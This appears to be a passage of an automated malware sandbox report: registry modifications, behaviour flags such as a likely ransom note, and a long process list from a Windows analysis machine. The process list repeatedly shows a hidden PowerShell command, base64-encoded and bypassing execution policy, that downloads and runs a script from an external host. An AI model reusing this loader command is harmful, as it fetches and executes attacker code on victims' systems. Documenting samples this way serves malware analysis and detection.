| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0\MRUListEx = ffffffff | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 000000000200000001000000ffffffff | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wordpad.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wordpad.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\wordpad.exe
"C:\Users\Admin\AppData\Local\Temp\wordpad.exe"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff99a76ab58,0x7ff99a76ab68,0x7ff99a76ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1720 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2308 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3052 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3828 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4552 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4580 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4896 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x25c,0x260,0x264,0x238,0x268,0x7ff674a0ae48,0x7ff674a0ae58,0x7ff674a0ae68
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault65846a50hfc51h4d05h9d25h9864a4563275
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xc0,0x12c,0x7ff996c046f8,0x7ff996c04708,0x7ff996c04718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,15164911270397511287,14043078291404356030,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,15164911270397511287,14043078291404356030,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,15164911270397511287,14043078291404356030,131072 --lang=de --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4268 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5024 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2504 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2860 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5184 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5372 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5504 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=3164 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5480 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=3068 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5296 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4000 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5724 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=2516 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5728 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=3084 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4392 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4520 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=5196 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5080 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=qrcode_generator.mojom.QRCodeGeneratorService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4400 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\" -spe -an -ai#7zMap26044:190:7zEvent3368
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=4244 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=4776 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4868 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3404 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\" -spe -an -ai#7zMap27821:190:7zEvent7189
C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe
"C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe"
C:\Windows\system32\NOTEPAD.EXE
